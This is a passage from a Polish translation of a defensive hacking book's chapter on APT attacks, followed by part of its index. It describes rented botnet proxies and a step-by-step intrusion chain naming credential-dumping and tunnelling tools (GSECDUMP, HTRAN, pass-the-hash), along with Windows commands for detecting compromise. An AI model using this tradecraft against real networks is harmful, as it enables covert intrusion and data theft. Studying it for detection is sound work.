DDoS, generują fałszywe kliknięcia w celu zwiększenia dochodów z reklam, a także

zdalnie instalują i wykonują dodatkowe trojany z „furtkami” (w tym programy

do wykradania haseł i informacji, narzędzia RAT, serwery reverse proxy i zdalne

 

424 Vademecum hackingu. Skuteczna obrona sieci przed atakami

Rysunek 6.35. Wynajmij botnet oparty na TDSS-ie ( ródo: krebsonsecurity.com/2011/09/rent-

-a-bot-networks-tied-to-tdss-botnet/; inne materiay s dostpne w wyszukiwarce Google

zapytanie intext:"The list of urgent proxies HTTP")

powłoki). Abonament jest dostępny przez serwis AWMProxy.net (obecny adres to

AWMProxy.com) i dotyczy zainfekowanych sieci komputerów z wybranych firm.

W większości ataków APT wykorzystuje się adresy sieciowe serwerów lub hostów

pośredniczących, co ułatwia komunikację C&C i utrudnia znalezienie sprawców

przez zidentyfikowanie hosta (należy on do firmy lub niewinnej osoby). Sieci pośredniczące

obejmujące hosty z sieci botnet utworzonych za pomocą TDSS-a są wykorzystywane

przez napastników do namierzania i infiltrowania celów oraz instalowania

dodatkowych narzędzi, co ułatwia dostęp (i przyspiesza włamania). Od

2011 roku podejście to stosuje się w coraz większej liczbie ataków APT.

TYPOWE OZNAKI ATAKÓW APT

Wbrew powszechnemu przekonaniu większość ataków nie polega na celowym hakowaniu

firmowych systemów. Zamiast tego napastnicy często stosują ukierunkowany

phishing za pomocą ogólnie namierzonych adresów (przez badanie domeny przy

użyciu publicznie dostępnych źródeł informacji) lub posługują się wirusami, aby

zainfekować komunikatory w celu wykradzenia haseł. Inne sposoby inicjowania ataku

to używanie komunikatorów lub innych narzędzi, w których użytkownik może kliknąć

 

Rozdzia 6. Cyberprzestpstwa i ataki APT 425

adres URL do szkodliwej witryny. W atakach APT czasem stosuje się też inne metody

inżynierii społecznej lub celowo atakuje i penetruje systemy, wykorzystując znane luki.

Można np. wstrzyknąć kod w SQL-u, aby zainfekować podatny na atak serwer WWW.

Te ostatnie techniki stosuje się jednak rzadziej, ponieważ są zbyt łatwe do wykrycia

i nie są spójne z celem napastników, czyli uzyskaniem dostępu do systemu w wyniku

działań użytkownika, a nie przez siłową penetrację.

W wielu sprawach dotyczących ataków APT badanych przez analityków zaobserwowaliśmy

pewien zbiór oznak włamania. Odkryliśmy, że na atak APT wskazują

następujące zjawiska:

 Wykorzystywanie w komunikacji sieciowej protokołu SSL lub szyfrowania

kluczem prywatnym. Możliwe jest też przesyłanie i odbieranie łańcuchów

znaków zakodowanych w formacie base64.

 Usługi zarejestrowane w węźle NETSVCS i powiązane z plikami .dll lub

.exe (lub podobnymi poprawnymi plikami systemu Windows) z katalogu

%SYSTEM%.

 Kopie plików cmd.exe, svchost.exe lub innych w katalogu %TEMP%.

 Pliki .lnk prowadzące do nieistniejących plików wykonywalnych.

 Pliki .rdp prowadzące do adresów IP z sieci zewnętrznej.

 Wpisy w dziennikach bezpieczeństwa systemu Windows dotyczące logowania

typu 3, 8 i 10 z zewnętrznych adresów i z komputerów o nazwach niezgodnych

z formatem używanym w organizacji.

 Wpisy w dziennikach zdarzeń aplikacji dotyczące zatrzymania i ponownego

uruchomienia programu antywirusowego lub zapory.

 Wpisy w dziennikach błędów serwera WWW i komunikatów HTTP dotyczące

uruchamiania i zatrzymywania usług, logowania do lokalnego hosta lub przez

administratora, transferu plików i połączeń z wybranymi adresami.

 Odnotowanie w dziennikach programu antywirusowego lub systemu prób

tworzenia plików w katalogach C:\, C:\TEMP lub innych zastrzeżonych

obszarach.

 Wykrycie przez program antywirusowy narzędzi PWS, Generic Downloader

lub Generic Dropper.

 Nietypowe wpisy w plikach .bash_history, /var/logs i konfiguracji usług.

 Niespójne znaczniki czasu plików systemu operacyjnego.

Najczęściej stosowana metoda ataku, z którą się ostatnio zetknęliśmy, wygląda tak:

1. Na adresy pracowników firmy trafia e-mail rozsyłany w ramach

ukierunkowanego phishingu.

 

426 Vademecum hackingu. Skuteczna obrona sieci przed atakami

2. Użytkownik otwiera e-mail i klika odnośnik, co powoduje otwarcie przeglądarki

lub innej aplikacji (takiej jak Adobe Reader, Microsoft Word, Microsoft Excel

lub Outlook Calendar). Użytkownik jest przekierowywany pod ukryty adres

obejmujący klucz zakodowany w formacie base64.

3. Ukryty adres prowadzi do witryny do zbierania danych (ang. drop site),

która sprawdza przeglądarkę pod kątem znanych luk i zwraca program

do pobierania trojanów. Program ten jest zwykle tymczasowo zapisywany

w katalogu c:\documents and settings\<użytkownik>\local settings\temp

i zostaje automatycznie uruchomiony.

4. Uruchomiony program wykonuje instrukcje zakodowane w formacie base64

i przechodzi do innej witryny, z której pobiera program do instalowania

trojanów. Ten ostatni służy do zainstalowania trojana z „furtką”. Trojan ten

zwykle:

a) wchodzi w skład pakietu z programem instalacyjnym, który zostaje usunięty;

trojan z „furtką” zaczyna wtedy przesyłać dane do serwera C&C podanego

w pliku binarnym z trojanem

lub

b) jest żądany z witryny (może to być ta sama witryna, z której pobrano

program instalacyjny) na podstawie informacji o konfiguracji systemu

przekazanych przez program instalacyjny; następnie program instalacyjny

zostaje usunięty, trojan z „furtką” zaczyna wtedy przesyłać dane do serwera

C&C podanego w pliku binarnym z trojanem.

5. Program do pobierania trojanów zwykle umieszcza trojana z „furtką” w katalogu

c:\windows\system32 i rejestruje plik .dll lub .exe w węźle HKLM\System\

<Controlset>\Services rejestru. Zwykle z wpisem trojana jest łączona instrukcja

svchost.exe netsvcs –k (aby trojan działał jako usługa i wznawiał pracę

po ponownym uruchomieniu systemu).

6. Trojany z „furtką” zwykle mają nazwy podobne do plików systemu Windows.

7. Trojan z „furtką” stosuje szyfrowanie SSL do komunikacji z serwerem C&C.

Odbywa się ona przez serwer pośredniczący, który przekierowuje dane zgodnie

z instrukcjami zapisanymi w formacie base64 lub hasłami z nagłówków.

Często transmisja odbywa się z udziałem kilku pośredników, co pozwala ukryć

drogę do serwera C&C. Sygnał jest zwykle wysyłany okresowo, np. co pięć

minut lub co kilka godzin.

8. Napastnik komunikuje się z trojanem z „furtką” przez sieć pośredniczącą

(a czasem bezpośrednio z poziomu serwera C&C). Połączenia są zwykle

szyfrowane za pomocą protokołu SSL, nawet jeśli są wykorzystywane

niestandardowe porty.

9. Napastnicy zwykle zaczynają od uzyskania listy nazw komputerów i kont

użytkowników. Pozwala to poznać stosowane w firmie formaty nazw. Następnie

 

 

 

Cała książka jest do kupienia na

http://fraktalla.com/ksiazka/McClure-Stuart-ScambrayJoel-Kurtz-George/Vademecum-hackingu-7,62741001427KS

 

 

Rozdzia 6. Cyberprzestpstwa i ataki APT 427

jest używane narzędzie typu pass-the-hash lub do pobierania informacji

na temat zabezpieczeń (często są to programy HOOKMSGINA lub

GSECDUMP). Pozwala to uzyskać dane na temat kont lokalnych i kont usługi

Active Directory.

10. Napastnik w ramach wstępnego rekonesansu często podnosi uprawnienia

za pomocą usług, aby móc poruszać się w poziomie po sieci. Przykładowo,

jeśli podnosi lokalne uprawnienia za pomocą aplikacji z luką (np. Internet

Explorera), często wykorzystuje harmonogram zadań, aby uruchomić

powłokę poleceń z uprawnieniami administratora lub usługi. Jest to znana

i często wykorzystywana luka występująca we wszystkich wersjach systemu

Windows oprócz 7. Dlatego ważne jest, aby sprawdzać także zaplanowane

zadania.

11. Napastnik łamie hasła w trybie offline, a następnie za pomocą danych

uwierzytelniających przeprowadza rekonesans w zainfekowanej sieci.

Wykorzystuje do tego trojana z „furtką”, skanowanie sieci oraz wyliczanie

udziałów i usług za pomocą DOS-a. Pomaga to ustalić, do jakich innych maszyn

można uzyskać dostęp.

12. Po ustaleniu możliwości dostępu do maszyn w sieci napastnik stosuje narzędzia

administracyjne systemu Windows, np. MSTSC (RDP), SC, NET itd.

Jeśli dostęp jest ograniczony z uwagi na segmentację sieci, często wykorzystuje

się pośrednika z funkcją translacji NAT.

13. Po zakończeniu rekonesansu i poruszania się w poziomie po sieci napastnicy

przechodzą do drugiego etapu. Instalują dodatkowe trojany z „furtkami”

i narzędzia typu reverse proxy (np. HTRAN), aby zapewnić sobie bardziej

bezpośredni dostęp i utworzyć punkty transferu.

14. Punkt transferu służy do zbierania i wykradania określonych zastrzeżonych

informacji. Dane zwykle przesyła się w zaszyfrowanych archiwach .zip lub .rar,

często dla niepoznaki zapisanych jako pliki .gif. Oto niektóre artefakty związane

z opisywanymi działaniami:

 trojan z „furtką” o nazwie podobnej do pliku systemu Windows,

 narzędzia GSECDUMP lub HOOKMSGINA,

 PsExec lub inne narzędzia z pakietu Sysinternals,

 HTRAN (w systemach intranetowych) albo ReDUH lub ASPXSpy

(w strefie ograniczonego zaufania lub na serwerach WWW),

 plik svchost.exe w katalogu %TEMP% mający około 300 kilobajtów

(jest to kopia pliku cmd.exe, tworzona przy nawiązywaniu sesji RDP

za pomocą trojanów z „furtką”; standardowy rozmiar pliku svchost.exe

to ok. 15 kilobajtów),

 pliki .lnk lub .pf powiązane z DOS-owymi poleceniami używanymi

przez napastnika,

 

428 Vademecum hackingu. Skuteczna obrona sieci przed atakami

 pliki .rdp i .bmc tworzone lub modyfikowane w trakcie poruszania

się napastnika po sieci,

 wpisy w różnych plikach dziennika (w tym komunikatów HTTP i błędów,

jeśli napastnik używa narzędzi ReDUH lub ASPXSpy) i dzienniku

bezpieczeństwa systemu Windows wskazujące na boczne ruchy w sieci.

Wykrywanie ataków APT

Istnieje kilka skutecznych rozwiązań pomocnych przy wykrywaniu ataków tego

rodzaju. Jednak najłatwiejszym sposobem jest zastosowanie prostej procedury administracyjnej.

Można np. wykorzystać skrypt logowania, który tworzy indeks systemu

plików (c:\dir /a /s /TC > \index\%computername%_%date%.txt), do śledzenia zmian

wprowadzanych w systemie. Analiza różnicowa odpowiednich indeksów pomaga

wykryć podejrzane pliki, którym warto się przyjrzeć na firmowych komputerach.

Co więcej, można ustawić SMS-owe alarmy zgłaszane przy logowaniu się na konta

administratorów lokalnych i domeny na stacje robocze oraz serwery. Pomaga to

ustalić sposób działania napastników i odkryć informacje przydatne w trakcie analizowania

incydentu. Także zasady zapory i systemu IDS używane do śledzenia danych

kierowanych do technologii RDP i VNC, programu cmd.exe, konta administratora

i ważnych kont pracowników działu IT pozwalają wykrywać podejrzaną aktywność.

Choć te techniki wydają się proste, stanowią praktyczne rozwiązanie stosowane przez

osoby odpowiedzialne za reagowanie na incydenty. Są to wartościowe metody, które

warto uwzględnić w korporacyjnym programie bezpieczeństwa.

Oto inne ważne technologie, które pomagają wykrywać i zwalczać ataki APT:

 Produkty zapewniające bezpieczeństwo systemów końcowych — programy

antywirusowe, systemy HIPS i narzędzia sprawdzające integralność systemu

plików.

 Produkty do inspekcji systemów plików (odpowiedzialne za kontrolowanie

i inspekcję zmian).

 Narzędzia do badania i ochrony sieci, np. systemy IDS i IPS.

 Produkty do monitorowania sieci pełniące funkcję bram lub filtrów sieciowych

(np. Snort lub TCPDUMP).

 Produkty do zarządzania informacjami i zdarzeniami z obszaru bezpieczeństwa,

z bazami danych na temat włamań i raportami.

Proponowane tu narzdzia te mog zosta zainfekowane. Ponadto system moe by zainfekowany

w takim stopniu, e narzdzia bd zwracay nieprawdziwe informacje. Dlatego

zachowaj ostrono w trakcie wykonywania opisanych dalej kroków i nie wykluczaj wamania,

nawet jeli nie udao Ci si wykry jego ladów.

ostrzeenie

 

Rozdzia 6. Cyberprzestpstwa i ataki APT 429

Wszystkie instrukcje uruchamiaj z poziomu wiersza poleceń DOS-a (uruchomionego

z uprawnieniami administratora), a dane zapisuj do pliku (>> %nazwa_

komputera%_APT.txt).

dir /a /s /od /tc c:\

1. Sprawdź, czy w katalogu %temp% (c:\documents and settings\<użytkownik>\

local settings\temp) nie znajdują się pliki .exe, .bat lub .*z*.

2. Sprawdź, czy w katalogu %application data% (c:\documents and settings\

<użytkownik>\application data) nie znajdują się pliki .exe, .bat lub .*z*.

3. Sprawdź, czy w katalogu %system% (c:\windows\system32) nie znajdują się pliki

.dll, .sys i .exe, których nie ma w katalogu instalacyjnym (i386/winsxs/dllcache).

Zwróć też uwagę na pliki o odmiennych od oryginału datach utworzenia

lub rozmiarach.

4. Sprawdź katalog %system% (c:\windows\system32) pod kątem plików .dll, .sys

i .exe o nieoczekiwanych datach utworzenia.

5. Sprawdź, czy plik c:\windows\system32\etc\drivers\hosts ma standardową

wielkość 734 bajtów.

6. Sprawdź, czy w katalogu c:\ nie występują pliki .exe i .*z*.

7. Poszukaj plików z .rdp (połączenia z) i .bmc (połączenia do) według

odpowiednich dat oraz kont.

8. Poszukaj plików .lnk i .pf według odpowiednich dat oraz kont.

9. Poszukaj w katalogu c:\Recycler\ plików .exe, .bat, .dll itd.

10. Porównaj działanie sieci w różnych dniach i godzinach:

ipconfig /displaydns

11. Zapisz nazwy FQDN i adresy IP w pliku.

12. Sprawdź wyniki wykonania poniższych instrukcji pod kątem czarnej listy

lub anomalii:

reg query hklm\software\microsoft\windows\currentversion\run /s

reg query hklm\software\microsoft\windows\currentversion\runonce /s

13. Sprawdź węzły ze ścieżkami obejmującymi katalog %temp% lub %application

data%.

14. Poszukaj nietypowych węzłów w ścieżkach %system% lub %program files%.

15. Poszukaj połączeń z opisem USTANOWIONO lub NASŁUCHIWANIE

z zewnętrznymi adresami IP:

netstat -ano

16. Zapisz identyfikatory PID, których chcesz szukać w danych zwróconych przez

instrukcję tasklist:

 

430 Vademecum hackingu. Skuteczna obrona sieci przed atakami

tasklist /m

17. Poszukaj identyfikatorów PID w danych zwróconych przez instrukcję netstat.

Zwróć uwagę na nietypowe nazwy usług.

18. Zwróć uwagę na nietypowe pliki .exe i .dll w danych zwróconych przez poniższe

instrukcje:

at

schtasks

19. Poszukaj zadań zaplanowanych w nietypowy sposób (instrukcja at).

20. Sprawdź ścieżkę i plik .exe powiązane z nietypowymi zadaniami:

reg query HKLM\system\currentcontrolset\services /s /f ServiceDLL

21. Poszukaj usług o nietypowych nazwach.

22. Poszukaj nietypowych ścieżek do plików .dll usług i niewłaściwych nazw.

Jeśli uruchomisz podane polecenia na wszystkich hostach w sieci i wczytasz

wyniki do bazy SQL, będziesz mógł w wydajny sposób przeprowadzić analizę.

Dodatkową zaletą wykonania tych operacji jest przygotowanie punktu

odniesienia przydatnego w trakcie ewentualnych analiz porównawczych.

Zabezpieczanie si przed atakami APT

Ataki APT rozpoczynają się od tego, że użytkownik pomyłkowo otwiera dokument,

klika odnośnik do strony internetowej lub uruchamia program. Nie wie przy tym,

jakie będzie to miało skutki dla systemu. Choć moglibyśmy opisać w tym miejscu

wszelkie możliwe sposoby przeprowadzania ataków APT, odsyłamy Cię do

rozdziału 12. Znajdziesz w nim wszystkie podstawowe informacje potrzebne do zapobiegania

atakom APT.

PODSUMOWANIE

Obecnie największym zagrożeniem w cyberprzestrzeni nie są głośne włamania lub

sieci botnet wykorzystywane do ataków na systemy organizacji. Bardziej niebezpieczni

są ukryci intruzi, którzy przez długi czas pozostają niewykryci i ukradkiem wyszukują

oraz wykradają materiały z docelowej sieci. Te dyskretne, ale bardzo precyzyjnie

wymierzone ataki (nazywane czasem atakami APT) są odpowiednikiem szpiegostwa

w cyberprzestrzeni, ponieważ zapewniają ciągły dostęp do chronionych firmowych

informacji. Tego rodzaju niezauważane, ale groźne włamania mogą mieć bardzo

poważne skutki. Mogą dotknąć każdą firmę, agencję rządową lub cały kraj — niezależnie

od branży lub lokalizacji geograficznej.

Cała książka jest do kupienia na

http://fraktalla.com/ksiazka/McClure-Stuart-ScambrayJoel-Kurtz-George/Vademecum-hackingu-7,62741001427KS

 

SKOROWIDZ

A

ACL, Access Control List, 36, 268

AD, Active Directory, 130, 177

adres

IP, 60

MAC, 41

ADS, Alternate Data Streams, 256

agent

odzyskiwania kluczy, 268

przekazywania wiadomości, 317

SNMP, 193

aktualizacje, 280

aktywne monitorowanie, 772

algorytm

DES, 339

DSP FFT, 445

haszowania hasła, 336

MD5, 239

NTLM, 235

tworzenia skrótów, 236

analiza

pakietów, 409

widma, 586

analizator

logiczny, 591

pakietów, 694

analizowanie

dzienników, 402

pamięci, 391

plików .bmc, 405

plików .rdp, 404

pliku test-cgi.php, 419

anomalie w katalogu System32, 406

anonimowa komunikacja, 28

antena

panelowa, 545

typu talerz, 545

Yagi, 545

anteny

dookólne, 544

kierunkowe, 544

wielokierunkowe, 544

aplet Javy, 504

aplikacja

Android Market, 686, 689

Google Wallet, 718, 719

HTC Logger, 717

mundaya, 688

Superuser, 687

aplikacje

fabryczne, 749

na Androida, 689, 691

natywne, 693

sieciowe, 623

APR, ARP Poison Routing, 217

APT, Advanced Persistent Threats, 23, 374

architektura

Androida, 676

IPSec, 191

 

802 Vademecum hackingu. Skuteczna obrona sieci przed atakami

archiwa, 48

ARP, Address Resolution Protocol, 79

ASEP, Autostart Extensibility Points, 259, 766

ASLR, Address Space Layout Randomization,

200, 728

ASP, Active Server Pages, 611

ASS, Autonomous System Scanner, 177

atak

FTP bounce, 97

Gh0st, 409

man-in-the-middle, 216, 742

Nitro, 421

pass-the-hash, 218

return-to-libc, 298

rootkita, 369

shatter attack, 276

SYN flood, 96

XSS, 636

ataki

APT, 374–430

fazy, 377

grupa Anonymous, 382

na system Linux, 410, 420

narzdzia, 384

operacja Aurora, 379

RBN, 383

rozpoznawanie oznak, 425

szkodliwy e-mail, 387

techniki, 378

wykrywanie, 428

zabezpieczenia, 430

bez uwierzytelniania, 201

CRC-32, 331

CSRF, 584, 643, 645

DDoS, 423, 797

na Adobe Flash Player, 225

na algorytm WEP, 554

na bazy danych

metody porednie, 667

z poziomu sieci, 654, 657

na bazy Oracle, 188

na domowe rutery, 42

na klienta, 539

na OpenSSH, 118

na OpenSSL, 332

na protokół EAP, 564

na protokół IKE, 487, 489

na serwer Apache, 334

na sieci VoIP, 510, 511

na sieci z obsługą szyfrowania, 553

na sieci z uwierzytelnianiem, 558

na systemy SCADA, 52

na urządzenia, 572

oparte na danych, 292

oparte na getadmin, 229

oparte na przekierowaniu, 216

przez fałszowanie danych, 203

przez fałszowanie nazw, 218

przez odbicie danych, 216

przez odmowę usługi, 328, 532, 552, 604,

617, 794–797

przez połączenie anonimowe, 150

przez przepełnienie bufora, 273, 292

przez sesję zerową, 150

przez unieważnienie uwierzytelnienia, 552

przez zimne przeładowanie, 269

siłowe, 38, 134, 288

siłowe na pocztę głosową, 480

słownikowe, 134

słownikowe zautomatyzowane, 335

w trybie odbiorczym, 288

w trybie offline, 529

z uwierzytelnianiem, 201, 229, 257

z wykorzystaniem

przepenienia, 304

wiszcych wskaników, 308

znaku, 306

za pomocą formatujących łańcuchów

znaków, 299

zdalne, 221, 315

automatyczne

aktualizacje, 262

skanery luk, 121

uruchamianie programów, 259

wyliczanie użytkowników, 517

autoryzacja, 760

autoryzacja MIC, 760

B

backdoor, 247, 259

badania BSIMM, 775

badanie serwerów IPSec VPN, 487

baner

logowania, 209

z informacjami o systemie, 127

banery telnetu, 127

 

Skorowidz 803

baza danych

ARIN, 62

GHDB, 49

RDBMS, 639

BDC, Backup Domain Controller, 146

BDE, BitLocker Drive Encryption, 268

bezpieczeństwo

autoryzacja, 760

dynamiczne wzbogacanie, 762

inspekcja, 759

instalowanie poprawek, 771

iPhone’ów, 740

kontrolowane awarie, 763

obiektów komputera, 266

podział zadań, 758

przez niezrozumiałość, 513

reagowanie na incydenty, 758

stosowanie warstw, 761

systemu iOS, 728

systemu Windows, 279

szkolenia, 763

urządzeń przenośnych, 753

usuwanie zasobów, 758

uwierzytelnianie, 760

wykrywanie włamań, 758

zabezpieczanie punktów końcowych, 758

zabezpieczenia techniczne, 759

zapewnianie kontroli i równoważenia, 759

zapobieganie zmowie, 759

bezpieczne

korzystanie z internetu, 226

programowanie, 294, 310

bezpieczny zdalny dostęp, 331

bezpośrednie sprawdzanie portów, 88

BGP, Border Gateway Protocol, 174

biała lista, 304

biblioteka hack_library, 532

biblioteki współużytkowane, 346

bilet

TGT, 220

Kerberosa, 220

BIND, Berkeley Internet Name Domain, 132

bit SUID, 342, 346, 349

blokowanie

dostępu do informacji, 164

dostępu do portów, 280

dostępu do rejestru, 168

dostępu do tftpboot, 137

dostępu do urządzenia, 128

instalowania aplikacji, 711

kodu, 296

konta na serwerze, 159

netcata, 408

połączeń anonimowych, 163

portu 79, 137, 149

przesyłania informacji o strefie, 134

skanowania, 121

wywołania instrukcji EXPN, 130

żądań rekordu version.bind, 134

błąd posiadania znaku, 306

błędy

obsługi sygnałów, 345

przepełnienia bufora, 370

w jądrze, 347

w konfiguracji baz danych, 666

w konfiguracji systemu, 352

w silnikach bazodanowych, 657

botnet, 424

brama

Asterisk, 515

SIP, 515, 532

C

Cain

funkcja fałszowania pakietów ARP, 213

opcja Send All to Cracker, 213

podsłuchiwanie uwierzytelniania, 213

szperacz pakietów, 213

CDE, Common Desktop Environment, 318

CDR, Call Detail Record, 481

cebulowy serwer pośredniczący, 28

centrum zabezpieczeń, 263

CIDR, Classless Inter-Domain Routing, 80

CRC, Cyclic Redundancy Checking, 380

CSRF, Cross-Site Request Forgery, 644

CSS, Cascading Style Sheet, 40

CTL, Certificate Trust List, 522

CVS, Concurrent Version System, 289

cyberbezpieczeństwo, 19

czarna lista, 303

czas potrzebny do złamania hasła, 215, 238

czyszczenie dziennika zdarzeń, 255, 360, 365

 

804 Vademecum hackingu. Skuteczna obrona sieci przed atakami

D

Dalvik, 677

DAM, Database Activity Monitoring, 774

dane

CPLC, 719

wejściowe, 302

z aplikacji Skype, 711, 713

ze skanowania, 112

dekodowanie symboli, 593

demon xinetd, 296

DEP, Data Execution Prevention, 273

DLP, Data Leak Prevention, 765

DNS, 328, 329

dokument

NIST 800-63, 241

RFC 1323, 107

RFC 1644, 109

RFC 1812, 106

RFC 2052, 130

RFC 2196, 54

RFC 2571, 174

RFC 3227, 388

RFC 792, 81

RFC 793, 107

RFC 952, 67

Site Security Handbook, 54

dokumentacja HOWTO, 350

DoS, Denial of Service, 532, 552, 794

dostęp

do agenta SNMP, 169

do internetu, 502, 707

do kodu źródłowego Androida, 677

do konfiguracji rutera, 136

do konta administratora, 356, 682

do konta SYSTEM, 230

do konta użytkownika, 229

do maszyn w sieci, 427

do pliku passwd, 335

do portu 135, 144

do powłoki, 410, 495

do powłoki przez kod w PHP, 420

do rejestru, 168

do sieci, 276

do strumienia, 526

do systemu, 117

do systemu plików, 502, 505

do systemu pomocy, 502

do udziału IPC$, 205

do układów elektrycznych, 586

do urządzenia, 128, 751

do usług TS, 249

do usługi AD, 180

do węzłów, 259

do wywołań MSRPC, 144

do zasobów serwera, 216

do zdalnej powłoki, 706

lokalny, 286, 335

zdalny, 286, 287

dostępne źródła danych, 63

dowiązania symboliczne, 341–343

drukowanie, 501

DTLS, Datagram Transport Layer Security, 532

dynamiczne zabezpieczenia, 763

dyski ATA, 580

działanie WarVOX-a, 445

dziennik

logowania, 360

programu antywirusowego, 407

wtmp, 361

zdarzeń, 211, 255, 402

E

edytor obiektów zasad grupy, 266

edytory tekstu, 505

EFS, Encrypting File System, 267

eksploit, 112, 124

Burrito Root, 685

LSADump, 230

odbiornika TNS, 654

RageAgainstTheCage, 702

eksploity

aplikacji użytkowych, 225

sterowników urządzeń, 227

trybu chronionego, 273

emulator Androida, 679

emulatory sprzętowe, 599

eskalacja uprawnień, 335

F

fałszowanie

adresu IP telefonu, 514

danych uwierzytelniających, 202, 555

dzwoniącego numeru, 448

pakietów ARP, 216, 524

żądań NTLM, 217

 

Skorowidz 805

fałszywe

kliknięcia, 423

skanowanie, 97

fałszywy e-mail, 409

FEK, File Encryption Key, 267

FileZilla, 126

filtr

ISAPI, 614

WebDAV, 614

filtrowanie danych w sieci, 29

fingerprinting

aktywny stosu, 105

pasywny stosu, 109

usług, 117

firma

Avaya, 510

Carrier IQ, 715, 717

Cisco, 510, 522

Citrix, 489

HP, 632

IBM, 635

Nortel, 528

Oracle, 659

SPI Dynamics, 630

firmware, 594

footprinting, 30, 34–75

badanie nazw DNS, 64

badanie trasy pakietu, 71

identyfikowane informacje, 35

informacje dostępne publicznie, 37

informacje na temat adresów IP, 59

informacje na temat domen, 57

informacje o pracownikach, 42

informacje o strefie, 65

informacje o zabezpieczeniach, 47

informacje zarchiwizowane, 48

lokalizacja, 40

obecne wydarzenia, 46

powiązane organizacje, 40

strony firmowe, 38

uprawnienia, 37

zaawansowane opcje wyszukiwania, 48

footprinting numerów telefonów, 439

format

base64, 426

ELF, 681

G.711, 527

MCF, 338

RPM, 355

SWF, 38

formatujące łańcuchy znaków, 299–301

fragmentacja systemu Android, 699

framework

Metasploit, 221, 249

WebScarab, 625

FTP, File Transfer Protocol, 125, 315

fundacja EFF, 28

funkcja

Alerty Google, 485

DEP, 273

LSA Secrets, 242

malloc, 309

memcpy(), 307

mktemp(), 343

MS-Cache Hashes, 245

NTFS streaming, 256

NX-bit, 297

PMIE, 760

printf(), 301

SSP, 295

Street View, 41

SYSKEY, 281

tmpfile(), 343

WFP, 269

Windows Service Hardening, 274

WRP, 270

xmalloc(), 331

XOR, 408

funkcje

bezpieczeństwa w Windows, 262

rootkita enyelkm, 367

SSI, 651

furtki, backdoor, 247, 259

G

GHDB, Google Hacking Database, 49

GPS, Global Positioning System, 545

grupa

Anonymous, 382

Everyone, 181

Opcje zabezpieczeń, 167

Pre-Windows, 181

grupy dyskusyjne, 52

GTK, Group Temporal Key, 540

 

806 Vademecum hackingu. Skuteczna obrona sieci przed atakami

H

hakowanie, 19

Androida, 673

aplikacji i danych, 603

aplikacji sieciowych, 202, 618

bazy danych, 652

cudzych urządzeń, 698, 735

dysków ATA, 581

infrastruktury, 431

iPhone’ów, 729, 735, 751

kart magnetycznych, 575

kart RFID, 578

kiosków, 504

poczty głosowej, 476, 477

połączeń VoIP, 437

rozwiązań mobilnych, 671

serwerów WWW, 608

sieci bezprzewodowych, 535

sieci VPN, 482, 485, 489

sprzętu, 571

systemów PBX, 472, 475

systemu UNIX, 283

systemu Windows, 199

usług DISA, 480

własnych urządzeń z Androidem, 681

hasło, 231, 234, 241

do BIOS-a, 281

do konta nagios, 418

dysku, 579

konta usług, 242

hiperłącza, 501

HIPS, Host-based Intrusion Preventions System,

765

host pośredniczący, pivot host, 420

hosty usług, 275

I

ICE, In-Circuit Emulator, 599

ICMP, Internet Control Message Protocol, 81

ICS, Industrial Control Systems, 438

identyfikator

BSSID, 433

FCC, 592

OUI, 80

PID, 260, 392

RID, 157

SID, 156

SSID, 433, 538

URI, 708

VLAN ID, 527

VVID, 527

identyfikatory

sieciowe, 175

zabezpieczeń, security identifiers, 156

identyfikowanie

pinów, 589

sieci, 176

systemu, 104

układów scalonych, 587

usług, 95

IDS, Intrusion Detection System, 36, 90, 102

IDT, Interrupt Descriptor Table, 367

ignorowanie pakietów SYN+FIN, 109

IIS, Internet Information Services, 140

IKE, Internet Key Exchange, 191, 483

implementacja OpenSSL, 333

infekowanie bazy danych, 668

informacje

na temat adresów, 59

na temat domen, 57

o banerach, 122

o geolokalizacji urządzenia, 42

o połączeniu, 397

o portach, 413

o pracownikach, 42

o protokole SNMP, 36

o strefie, 65–68, 130, 134

o systemie, 127

z rejestru, 153

inspekcja, 760

instalacja usługi AD, 181

instalowanie Metasploita, 112

instrukcja, Patrz polecenie

instrukcje w atakach XSS, 638

interfejs

API Power Manager, 707

AppScana, 635

ath0, 434

eth0, 525

ICSP, 597

JTAG, 588, 599

JTAG Wiggler, 601

NSE, 121

VFS, 368

WHOIS, 440

 

Skorowidz 807

inżynieria wsteczna firmeware’u, 594

IPP, Internet Printing Protocol, 612

IPS, Intrusion Preventions System, 74

IPSec, 191, 360

ISN, Initial Sequence Number, 106

IV, Initialization Vector, 554

izolowanie

sesji zerowej, 276

zasobów usług, 274

J

jailbreaking, 729, 739

jailbreaking zdalny, 734

jednostki

LIR, 56

NIR, 56

RIR, 56

język

ASPECT, 464

Lua, 652

NASL, 119

PL/SQL, 659

QBASIC, 464

VBA, 495

JSP, Java Server Pages, 611

JTAG, Joint Test Action Group, 599

K

kabel USB-JTAG, 600

kalkulator Microsoftu, 499

kanał powrotny programu nc, 314

kanały, 537

karta

dostępu

magnetyczna, 575

RFID, 578

NIC, 357

portu szeregowego, 442

sieciowa bezprzewodowa

chipset, 542

interfejs, 543

obsuga anteny, 543

obsuga pasma, 542

katalog

Active Directory, 265

kmem, 366

log, 360

Prefetch, 399, 404

syslog, 416

system32, 426

System32, 406

tftpboot, 137

tmp, 342

katalogi niezabezpieczone, 620

klient

ActiveX RDP, 49

FTP, 126

netcat, 31

nfs, 322

nslookup, 65

proxychain, 30

Vidalia, 29

VPN, 484

klucz

FEK, 267

PGP, 64

uderzeniowy, 573

WEP, 433, 554

wspólny, 559

klucze szyfrowania, 540

kod

testowy, 596

źródłowy ASP, 610

kodek G.729, 529

kolejka harmonogramu zadań, 261

komisja SEC, 46

kompilacja WarVOX, 446

kompilator skrośny, 692

komunikacja z modemami, 463

komunikat

ICMP ADDRESS MASK, 83

ICMP ECHO REQUEST, 84

ICMP TIME_EXCEED, 72

ICMP TIMESTAMP, 83

jar verified, 698

TIMESTAMP, 86

komunikaty

ICMP, 81

o błędach, 128

o błędach ICMP, 106

Toast, 707

konferencja FOCUS 11, 742

konfiguracja

modułu eksploita, 223

TFTP telefonu, 523

 

808 Vademecum hackingu. Skuteczna obrona sieci przed atakami

konfigurowanie

automatycznych aktualizacji, 262

narzędzia SessionID Analysis, 628

odbiornika netcata, 316

programu ldp, 178

przeszukiwania witryny, 622

zasad konta, 209

konserwacja oprogramowania, 771

konsola

GPMC, 265, 770

MMC, 265

konto

administratora, 230, 353

nagios, 418

SYSTEM, 230

usług, 242

kontrola

dostępu, 36, 270

konta użytkownika, 271

kontroler domeny, 178

kopiowanie

kart dostępu, 575, 578

powłoki poleceń, 258

L

LDAP, Lightweight Directory Access Protocol,

177

LEAP, Lightweight Extensible Authentication

